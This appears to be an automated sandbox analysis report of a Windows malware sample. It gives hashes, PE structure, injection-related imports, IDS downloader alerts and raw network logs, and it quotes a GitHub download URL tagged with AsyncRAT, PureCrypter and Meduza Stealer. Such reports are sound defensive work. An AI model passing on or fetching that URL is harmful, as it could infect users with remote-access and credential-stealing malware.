                                      https://github.com/Tarun999000/dfds/releases/download/fvxc/Order.receipt.845755-800.zipGet hashmaliciousPureCrypter, AsyncRAT, Meduza StealerBrowse
                                      • 104.21.48.1
                                      • 104.26.7.214
                                      • 34.160.111.145
                                      lambo.dllGet hashmaliciousUnknownBrowse
                                      • 104.21.48.1
                                      • 104.26.7.214
                                      • 34.160.111.145

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\raw[1].txt

                                      Download File
                                      Process:C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):12
                                      Entropy (8bit):2.8553885422075336
                                      Encrypted:false
                                      SSDEEP:3:fuMEc:23c
                                      MD5:99C7886BEA2DE7A0101C2650904125B2
                                      SHA1:923B92CB8983479444E728E099B85F84A8DC1358
                                      SHA-256:FFF62C3400A9C4F4618583FD90966E4E5B1122239157CAA576BFD6A1FA71204D
                                      SHA-512:7FB99EB3F5DF99B330325BB84C3676ABFD4BA02A2F37C596FDBD717FEEEA84887522E4957D57FD2C77A6A73C56656D1B8A8D17BB28CE158CD474ECE6E71B5565
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:8.46.123.189

                                      Static File Info

                                      General

                                      File type:PE32 executable (console) Intel 80386, for MS Windows
                                      Entropy (8bit):6.7617444964111115
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:jhdfer3s_jh3de.exe
                                      File size:585'728 bytes
                                      MD5:446fee24759b2800c4ee7851930f07aa
                                      SHA1:11378467db1872cb74b03738a7dc65abf1cc9459
                                      SHA256:c12deb8079c75ef4b96f4af778fbb811a5c766f0560d57d63d6772fbe76b6b33
                                      SHA512:8e7af46992d63b4cabbd7e5c7d438fa17a488e2240d817be94a5181cdd9aa4bb52f245840f812eb23687f69ef5a190a62a64dcb69084963dfb213bc0c9bbcdaf
                                      SSDEEP:12288:WMelabCvvFcrubY4hBdANVwb6zNC9DADTDB7FD:W7labCv28YKUVwPOD9F
                                      TLSH:88C4CF01EE17C4FAED6700B8506FA32FE63219244720CAE7CFD05D56F5AABE169314A7
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................8.....Q.......Q.......Q.......Q.......2...........G...................Rich............................PE..L..

                                      File Icon

                                      Icon Hash:90cececece8e8eb0

                                      Static PE Info

                                      General

                                      Entrypoint:0x435b12
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows cui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x678E353B [Mon Jan 20 11:36:27 2025 UTC]
                                      TLS Callbacks:0x42a000
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:0
                                      File Version Major:6
                                      File Version Minor:0
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:0
                                      Import Hash:e8d64a8998e50d0f298558f80fef94e1

                                      Entrypoint Preview

                                      Instruction
                                      call 00007F29986C7B6Ch
                                      jmp 00007F29986C76A9h
                                      int3
                                      int3
                                      int3
                                      int3
                                      push ebx
                                      push esi
                                      mov eax, dword ptr [esp+18h]
                                      or eax, eax
                                      jne 00007F29986C784Ah
                                      mov ecx, dword ptr [esp+14h]
                                      mov eax, dword ptr [esp+10h]
                                      xor edx, edx
                                      div ecx
                                      mov ebx, eax
                                      mov eax, dword ptr [esp+0Ch]
                                      div ecx
                                      mov edx, ebx
                                      jmp 00007F29986C7873h
                                      mov ecx, eax
                                      mov ebx, dword ptr [esp+14h]
                                      mov edx, dword ptr [esp+10h]
                                      mov eax, dword ptr [esp+0Ch]
                                      shr ecx, 1
                                      rcr ebx, 1
                                      shr edx, 1
                                      rcr eax, 1
                                      or ecx, ecx
                                      jne 00007F29986C7826h
                                      div ebx
                                      mov esi, eax
                                      mul dword ptr [esp+18h]
                                      mov ecx, eax
                                      mov eax, dword ptr [esp+14h]
                                      mul esi
                                      add edx, ecx
                                      jc 00007F29986C7840h
                                      cmp edx, dword ptr [esp+10h]
                                      jnbe 00007F29986C783Ah
                                      jc 00007F29986C7839h
                                      cmp eax, dword ptr [esp+0Ch]
                                      jbe 00007F29986C7833h
                                      dec esi
                                      xor edx, edx
                                      mov eax, esi
                                      pop esi
                                      pop ebx
                                      retn 0010h
                                      push ebp
                                      mov ebp, esp
                                      test byte ptr [ebp+08h], 00000001h
                                      push esi
                                      mov esi, ecx
                                      mov dword ptr [esi], 0048BC70h
                                      je 00007F29986C783Ch
                                      push 0000000Ch
                                      push esi
                                      call 00007F29986C7E5Ah
                                      pop ecx
                                      pop ecx
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      push ebp
                                      mov ebp, esp
                                      mov eax, dword ptr [ebp+08h]
                                      push esi
                                      mov ecx, dword ptr [eax+3Ch]
                                      add ecx, eax
                                      movzx eax, word ptr [ecx+14h]
                                      lea edx, dword ptr [ecx+18h]
                                      add edx, eax
                                      movzx eax, word ptr [ecx+06h]
                                      imul esi, eax, 28h
                                      add esi, edx
                                      cmp edx, esi
                                      je 00007F29986C784Bh
                                      mov ecx, dword ptr [ebp+0Ch]
                                      cmp ecx, dword ptr [edx+0Ch]
                                      jc 00007F29986C783Ch

                                      Rich Headers

                                      Programming Language:
                                      • [IMP] VS2008 SP1 build 30729

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x8da1c0xc8.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x900000x1b20.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x8bd400x54.rdata
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x8bdc00x18.rdata
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x8bc800x40.rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x380000x16c.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x368760x36a00474a5b1cc8c6e2b652cff13ab1a18038False0.4363379576659039data6.111869830312897IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x380000x563700x56400a239b26647b7339ff954103c94598364False0.7182065217391305data6.203970863719999IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x8f0000x4cc0x20019105b211abb2af27ac74685d6dc572eFalse0.173828125data1.288496708765229IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .reloc0x900000x1b200x1c00f163e58231bf37d7fcac1ac25093c088False0.7869698660714286data6.556110791500844IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Imports

                                      DLLImport
                                      api-ms-win-core-synch-l1-2-0.dllWaitOnAddress, WakeByAddressAll, WakeByAddressSingle
                                      kernel32.dllInitializeSListHead, GetStdHandle, GetCurrentProcessId, TerminateProcess, HeapFree, HeapReAlloc, WaitForSingleObjectEx, LoadLibraryA, lstrlenW, CreateMutexA, GetProcessHeap, HeapAlloc, GetCurrentThread, IsDebuggerPresent, GetCurrentThreadId, SetThreadStackGuarantee, GetConsoleMode, AddVectoredExceptionHandler, GetEnvironmentVariableW, GetModuleHandleW, MultiByteToWideChar, WriteConsoleW, WideCharToMultiByte, GetModuleHandleA, GetCurrentDirectoryW, SetLastError, ReleaseMutex, GetProcAddress, RtlCaptureContext, GetCurrentProcess, QueryPerformanceCounter, GetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, CloseHandle, FreeConsole, GetSystemTimeAsFileTime, WaitForSingleObject, IsProcessorFeaturePresent
                                      ntdll.dllNtAllocateVirtualMemory, NtTestAlert, NtWriteVirtualMemory, NtQueueApcThread, RtlNtStatusToDosError, NtWriteFile
                                      VCRUNTIME140.dllmemmove, memset, memcmp, _CxxThrowException, __CxxFrameHandler3, _except_handler4_common, __current_exception_context, __current_exception, memcpy
                                      api-ms-win-crt-runtime-l1-1-0.dll_configure_narrow_argv, _initialize_narrow_environment, _get_initial_narrow_environment, _initterm, _initterm_e, exit, _exit, __p___argc, __p___argv, _cexit, _c_exit, _register_thread_local_exe_atexit_callback, _seh_filter_exe, _initialize_onexit_table, _register_onexit_function, _crt_atexit, _controlfp_s, terminate, _set_app_type
                                      api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                      api-ms-win-crt-stdio-l1-1-0.dll__p__commode, _set_fmode
                                      api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                      api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, free

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2025-01-22T08:41:51.184237+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44973134.160.111.145443TCP
                                      2025-01-22T08:41:51.870256+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449732104.26.7.214443TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 22, 2025 08:41:50.511033058 CET49731443192.168.2.434.160.111.145
                                      Jan 22, 2025 08:41:50.511065006 CET4434973134.160.111.145192.168.2.4
                                      Jan 22, 2025 08:41:50.511148930 CET49731443192.168.2.434.160.111.145
                                      Jan 22, 2025 08:41:50.529707909 CET49731443192.168.2.434.160.111.145
                                      Jan 22, 2025 08:41:50.529719114 CET4434973134.160.111.145192.168.2.4
                                      Jan 22, 2025 08:41:51.009402990 CET4434973134.160.111.145192.168.2.4
                                      Jan 22, 2025 08:41:51.009483099 CET49731443192.168.2.434.160.111.145
                                      Jan 22, 2025 08:41:51.055284977 CET49731443192.168.2.434.160.111.145
                                      Jan 22, 2025 08:41:51.055299997 CET4434973134.160.111.145192.168.2.4
                                      Jan 22, 2025 08:41:51.056200981 CET4434973134.160.111.145192.168.2.4
                                      Jan 22, 2025 08:41:51.056318045 CET49731443192.168.2.434.160.111.145
                                      Jan 22, 2025 08:41:51.059844971 CET49731443192.168.2.434.160.111.145
                                      Jan 22, 2025 08:41:51.103363037 CET4434973134.160.111.145192.168.2.4
                                      Jan 22, 2025 08:41:51.184370041 CET4434973134.160.111.145192.168.2.4
                                      Jan 22, 2025 08:41:51.184434891 CET49731443192.168.2.434.160.111.145
                                      Jan 22, 2025 08:41:51.184443951 CET4434973134.160.111.145192.168.2.4
                                      Jan 22, 2025 08:41:51.184489012 CET49731443192.168.2.434.160.111.145
                                      Jan 22, 2025 08:41:51.184493065 CET4434973134.160.111.145192.168.2.4
                                      Jan 22, 2025 08:41:51.184540033 CET49731443192.168.2.434.160.111.145
                                      Jan 22, 2025 08:41:51.184542894 CET4434973134.160.111.145192.168.2.4
                                      Jan 22, 2025 08:41:51.184590101 CET49731443192.168.2.434.160.111.145
                                      Jan 22, 2025 08:41:51.185786009 CET49731443192.168.2.434.160.111.145
                                      Jan 22, 2025 08:41:51.185798883 CET4434973134.160.111.145192.168.2.4
                                      Jan 22, 2025 08:41:51.201667070 CET49732443192.168.2.4104.26.7.214
                                      Jan 22, 2025 08:41:51.201760054 CET44349732104.26.7.214192.168.2.4
                                      Jan 22, 2025 08:41:51.201906919 CET49732443192.168.2.4104.26.7.214
                                      Jan 22, 2025 08:41:51.202167034 CET49732443192.168.2.4104.26.7.214
                                      Jan 22, 2025 08:41:51.202203989 CET44349732104.26.7.214192.168.2.4
                                      Jan 22, 2025 08:41:51.668042898 CET44349732104.26.7.214192.168.2.4
                                      Jan 22, 2025 08:41:51.668123960 CET49732443192.168.2.4104.26.7.214
                                      Jan 22, 2025 08:41:51.672472954 CET49732443192.168.2.4104.26.7.214
                                      Jan 22, 2025 08:41:51.672493935 CET44349732104.26.7.214192.168.2.4
                                      Jan 22, 2025 08:41:51.672967911 CET44349732104.26.7.214192.168.2.4
                                      Jan 22, 2025 08:41:51.673032999 CET49732443192.168.2.4104.26.7.214
                                      Jan 22, 2025 08:41:51.673350096 CET49732443192.168.2.4104.26.7.214
                                      Jan 22, 2025 08:41:51.715333939 CET44349732104.26.7.214192.168.2.4
                                      Jan 22, 2025 08:41:51.870259047 CET44349732104.26.7.214192.168.2.4
                                      Jan 22, 2025 08:41:51.870359898 CET49732443192.168.2.4104.26.7.214
                                      Jan 22, 2025 08:41:51.870398998 CET44349732104.26.7.214192.168.2.4
                                      Jan 22, 2025 08:41:51.870537996 CET44349732104.26.7.214192.168.2.4
                                      Jan 22, 2025 08:41:51.870584011 CET49732443192.168.2.4104.26.7.214
                                      Jan 22, 2025 08:41:51.870629072 CET49732443192.168.2.4104.26.7.214
                                      Jan 22, 2025 08:41:51.872838974 CET49732443192.168.2.4104.26.7.214
                                      Jan 22, 2025 08:41:51.872884989 CET44349732104.26.7.214192.168.2.4
                                      Jan 22, 2025 08:41:51.914880037 CET49733443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:51.914973021 CET44349733104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:51.914980888 CET49734443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:51.915036917 CET44349734104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:51.915098906 CET49733443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:51.915115118 CET49734443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:51.915424109 CET49734443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:51.915436029 CET44349734104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:51.915559053 CET49733443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:51.915607929 CET44349733104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:52.389055967 CET44349733104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:52.389276981 CET49733443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:52.393224955 CET49733443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:52.393254995 CET44349733104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:52.393690109 CET44349733104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:52.393753052 CET49733443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:52.394118071 CET49733443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:52.398649931 CET44349734104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:52.398781061 CET49734443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:52.401973963 CET49734443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:52.401988983 CET44349734104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:52.402391911 CET44349734104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:52.402580023 CET49734443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:52.402791023 CET49734443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:52.439331055 CET44349733104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:52.443351030 CET44349734104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:52.702518940 CET44349734104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:52.702595949 CET49734443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:52.702621937 CET44349734104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:52.702764988 CET44349734104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:52.702773094 CET49734443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:52.702953100 CET49734443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:52.704605103 CET49734443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:52.704622030 CET44349734104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:52.705388069 CET49735443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:52.705482006 CET44349735104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:52.705579996 CET49735443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:52.705828905 CET49735443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:52.705866098 CET44349735104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:52.712352991 CET44349733104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:52.712429047 CET49733443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:52.712449074 CET44349733104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:52.712505102 CET49733443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:52.712537050 CET44349733104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:52.712553978 CET49733443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:52.712568998 CET44349733104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:52.712613106 CET49733443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:53.186500072 CET44349735104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:53.186603069 CET49735443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:53.187470913 CET49735443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:53.187480927 CET44349735104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:53.229089022 CET49735443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:53.229094028 CET44349735104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:53.529090881 CET44349735104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:53.529171944 CET49735443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:53.529189110 CET44349735104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:53.529236078 CET49735443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:53.529263973 CET44349735104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:53.529320002 CET49735443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:53.530148029 CET49735443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:53.530160904 CET44349735104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:53.530170918 CET49735443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:53.530214071 CET49735443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:55.721621037 CET49736443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:55.721715927 CET44349736104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:55.721959114 CET49736443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:55.722351074 CET49736443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:55.722390890 CET44349736104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:56.200853109 CET44349736104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:56.201122046 CET49736443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:56.201685905 CET49736443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:56.201685905 CET49736443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:56.201719046 CET44349736104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:56.201761007 CET44349736104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:56.517374992 CET44349736104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:56.517462969 CET44349736104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:56.517472982 CET49736443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:56.517549992 CET49736443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:56.517796993 CET49736443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:56.517818928 CET44349736104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:58.549972057 CET49737443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:58.550035000 CET44349737104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:58.550271034 CET49737443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:58.550741911 CET49737443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:58.550774097 CET44349737104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:59.020934105 CET44349737104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:59.021037102 CET49737443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:59.021878004 CET49737443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:59.021893024 CET44349737104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:59.022074938 CET49737443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:59.022080898 CET44349737104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:59.361896038 CET44349737104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:59.361953974 CET49737443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:59.361985922 CET44349737104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:59.362004042 CET44349737104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:59.362029076 CET49737443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:59.362051010 CET49737443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:59.362163067 CET49737443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:59.362181902 CET44349737104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:59.362206936 CET49737443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:59.362234116 CET49737443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:59.533775091 CET49738443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:59.533833981 CET44349738104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:59.533909082 CET49738443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:59.534249067 CET49738443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:59.534270048 CET44349738104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:59.993113995 CET44349738104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:59.993314981 CET49738443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:59.994049072 CET49738443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:59.994077921 CET44349738104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:41:59.994236946 CET49738443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:41:59.994250059 CET44349738104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:00.309295893 CET44349738104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:00.309374094 CET44349738104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:00.309520006 CET49738443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:00.309962988 CET49738443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:00.310028076 CET44349738104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:03.315139055 CET49739443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:03.315198898 CET44349739104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:03.315285921 CET49739443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:03.315522909 CET49739443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:03.315535069 CET44349739104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:03.777918100 CET44349739104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:03.777988911 CET49739443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:03.778491974 CET49739443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:03.778500080 CET44349739104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:03.778997898 CET49739443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:03.779000998 CET44349739104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:04.109553099 CET44349739104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:04.109652042 CET49739443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:04.109678030 CET44349739104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:04.109718084 CET44349739104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:04.109723091 CET49739443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:04.109802008 CET49739443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:04.109965086 CET49739443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:04.109980106 CET44349739104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:04.394463062 CET49741443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:04.394526958 CET44349741104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:04.394639015 CET49741443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:04.394875050 CET49741443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:04.394907951 CET44349741104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:04.856784105 CET44349741104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:04.856873035 CET49741443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:04.857333899 CET49741443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:04.857362032 CET44349741104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:04.857544899 CET49741443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:04.857558012 CET44349741104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:05.192255974 CET44349741104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:05.192328930 CET49741443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:05.192351103 CET44349741104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:05.192406893 CET44349741104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:05.192419052 CET49741443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:05.192476034 CET49741443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:05.192493916 CET44349741104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:05.192533016 CET49741443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:05.192533016 CET49741443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:05.192648888 CET49741443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:07.112051010 CET49746443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:07.112080097 CET44349746104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:07.112163067 CET49746443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:07.112581015 CET49746443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:07.112592936 CET44349746104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:07.567452908 CET44349746104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:07.567539930 CET49746443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:07.568017006 CET49746443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:07.568027020 CET44349746104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:07.568181038 CET49746443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:07.568185091 CET44349746104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:07.887106895 CET44349746104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:07.887181044 CET49746443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:07.887206078 CET44349746104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:07.887268066 CET49746443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:07.887291908 CET44349746104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:07.887372017 CET49746443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:07.887562037 CET49746443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:07.887573957 CET44349746104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:08.915594101 CET5589653192.168.2.41.1.1.1
                                      Jan 22, 2025 08:42:08.920517921 CET53558961.1.1.1192.168.2.4
                                      Jan 22, 2025 08:42:08.920613050 CET5589653192.168.2.41.1.1.1
                                      Jan 22, 2025 08:42:08.949266911 CET53558961.1.1.1192.168.2.4
                                      Jan 22, 2025 08:42:09.433237076 CET5589653192.168.2.41.1.1.1
                                      Jan 22, 2025 08:42:09.438270092 CET53558961.1.1.1192.168.2.4
